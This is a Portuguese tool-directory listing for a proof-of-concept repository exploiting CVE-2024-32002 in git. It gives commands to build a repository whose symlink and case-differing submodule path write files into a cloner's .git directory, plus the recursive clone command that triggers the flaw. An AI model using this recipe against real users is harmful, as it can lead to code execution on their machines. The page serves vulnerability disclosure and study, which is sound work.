Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2024-32002-poc-aw — Um POC para o CVE-2024-32002 demonstrando escrita arbitrária no diretório .git. | Kitploit
Ferramentas/GitHubGitHub/jakob-pennington/cve-2024-32002-poc-aw
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubjakob-pennington/cve-2024-32002-poc-aw

cve-2024-32002-poc-aw

Um POC para o CVE-2024-32002 demonstrando escrita arbitrária no diretório .git.

Ver Repositório
45há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-32002 PRC AW

Um POC para CVE-2024-32002 demonstrando escrita arbitrária no diretório .git.

Veja cve-2024-32002-submodule-aw para o repositório de submódulo relacionado.

O que este repositório contém

  • Um link simbólico com um nome arbitrário que aponta para o diretório .git.
  • Um arquivo .gitmodules que define o submódulo malicioso.

Como recriar este repositório

Este repositório foi criado no Linux (WSL2, para ser específico). Isso é importante, o repositório malicioso só pode ser criado em um sistema de arquivos sensível a maiúsculas/minúsculas.

  1. Crie um link simbólico, usando apenas caracteres minúsculos
root@kitploit:~
ln -s .git submodule

Notas:

  • O link simbólico deve apontar para a pasta .git, já que é onde queremos escrever arquivos
  • O nome do link simbólico (submodule) é arbitrário, mas deve começar com um caractere minúsculo
  • Isso é importante, porque caracteres minúsculos são ordenados antes de caracteres maiúsculos. Quando a máquina que está clonando fica confusa sobre onde escrever os arquivos do submódulo, queremos que ela escolha o link simbólico e não um diretório normal.
  1. Adicione o submódulo malicioso, observando a diferença de maiúsculas/minúsculas no nome do diretório do submódulo
root@kitploit:~
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists

Notas:

  • O nome do submódulo importa, ele entrará em jogo ao colocar nosso hook no submódulo.
  • O primeiro segmento do caminho do submódulo ("Submodule") deve corresponder ao nome do link simbólico acima, diferindo apenas em maiúsculas/minúsculas.
  • Deve haver pelo menos um outro segmento no caminho, já que o git só clona submódulos em um diretório vazio. No entanto, ele criará diretórios para nós, então escolhemos "notexists" para demonstrar isso.

Como executar o POC

  1. Verifique se você tem uma versão vulnerável do git. Veja o aviso do GitHub para versões afetadas.
root@kitploit:~
git --version
  1. Pense se você conscientemente deseja executar um comando que poderia alcançar RCE... Este repositório é benigno, mas tem certeza?
  2. Execute o seguinte comando:
root@kitploit:~
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git
  1. Dê uma olhada no diretório .git. Veja algo fora do lugar. Dica: Quais arquivos estão no submódulo.
Baixar ferramenta